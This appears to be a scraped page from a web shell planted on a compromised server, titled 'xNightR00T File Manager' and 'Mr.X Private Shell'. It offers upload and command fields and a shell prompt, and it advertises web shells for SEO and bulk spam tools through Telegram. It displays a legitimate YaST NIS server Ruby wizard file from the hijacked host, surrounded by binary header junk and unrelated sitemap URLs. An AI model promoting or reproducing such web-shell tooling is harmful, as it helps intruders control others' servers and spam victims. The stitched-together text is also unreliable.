xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# ------------------------------------------------------------------------------
# Copyright (c) 2006-2012 Novell, Inc. All Rights Reserved.
#
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of version 2 of the GNU General Public License as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail, you may find
# current contact information at www.novell.com.
# ------------------------------------------------------------------------------

# File:	include/nis_server/wizards.ycp
# Package:	Configuration of NIS server
# Summary:	Wizards definitions
# Authors:	Martin Vidner <mvidner@suse.cz>
#              Dan Vesely <dan@suse.cz>
#
# $Id$
module Yast
  module NisServerWizardsInclude
    def initialize_nis_server_wizards(include_target)
      Yast.import "UI"
      textdomain "nis_server"

      Yast.import "Wizard"
      Yast.import "Label"
      Yast.import "Sequencer"

      Yast.include include_target, "nis_server/ui.rb"
    end

    # Main workflow of the NIS server configuration
    # @return sequence result
    def MainSequence
      aliases = {
        "begin"        => lambda { WhatToConfigure() },
        "exit_popup"   => lambda { ExitPopup() },
        "install"      => [lambda { InstallServer() }, true],
        "slave"        => lambda { SlaveDialog() },
        "query_hosts"  => lambda { QueryHosts() },
        "master"       => lambda { MasterDialog() },
        "details"      => lambda { DetailsDialog() },
        "maps"         => lambda { MapsDialog() },
        "decide"       => [lambda { SlaveExists() }, true],
        "master_slave" => lambda { MastersSlavesDialog() }
      }

      sequence = {
        "ws_start"     => "begin",
        "begin"        => {
          :slave   => "install",
          :master  => "install",
          :finish  => :next,
          :abort   => :abort,
          :exit    => "exit_popup",
          :nothing => :nothing
        },
        "exit_popup"   => { :exit => :exit, :back => "begin" },
        "install"      => {
          :master => "master",
          :slave  => "slave",
          :abort  => :abort
        },
        "slave"        => { :next => "query_hosts", :abort => :abort },
        "master"       => {
          :next    => "decide",
          :details => "details",
          :abort   => :abort
        },
        "details"      => { :next => "master", :abort => :abort },
        "decide"       => {
          :have_slave => "master_slave",
          :none_slave => "maps",
          :abort      => :abort
        },
        "master_slave" => { :next => "maps", :abort => :abort },
        "maps"         => { :next => "query_hosts", :abort => :abort },
        "query_hosts"  => { :next => :next, :abort => :abort }
      }

      ret = Sequencer.Run(aliases, sequence)

      ret
    end


    # Whole configuration of NIS server
    # @return sequence result
    def NisServerSequence
      aliases = {
        "read"          => [lambda { ReadDialog() }, true],
        "main"          => lambda { MainSequence() },
        "write"         => [lambda { WriteDialog() }, true],
        "result"        => lambda { ResultPopup() },
        "error_details" => lambda { DetailsPopup() }
      }

      sequence = {
        "ws_start"      => "read",
        "read"          => { :abort => :abort, :next => "main" },
        "main"          => {
          :abort   => :abort,
          :nothing => :nothing,
          :next    => "write"
        },
        "write"         => { :next => "result" },
        "result"        => { :ok => :next, :details => "error_details" },
        "error_details" => { :ok => "result" }
      }

      Wizard.CreateDialog
      Wizard.SetDesktopTitleAndIcon("nis_server")
      ret = Sequencer.Run(aliases, sequence)

      UI.CloseDialog
      ret
    end

    # Whole configuration of NIS server but without reading and writing.
    # For use with autoinstallation.
    # @return sequence result
    def NisServerAutoSequence
      # Translators: dialog caption
      caption = _("NIS Server Configuration")
      # label
      contents = Label(_("Initializing..."))

      Wizard.CreateDialog
      Wizard.SetContentsButtons(
        caption,
        contents,
        "",
        Label.BackButton,
        Label.NextButton
      )

      ret = MainSequence()

      UI.CloseDialog
      ret
    end
  end
end

Filemanager

Name Type Size Permission Actions
details.rb File 5.25 KB 0644
maps.rb File 4.11 KB 0644
master.rb File 8.39 KB 0644
routines.rb File 5.02 KB 0644
securenets.rb File 8.74 KB 0644
slave.rb File 4.63 KB 0644
slaves.rb File 7.52 KB 0644
ui.rb File 4.45 KB 0644
what.rb File 7.66 KB 0644
wizards.rb File 4.72 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml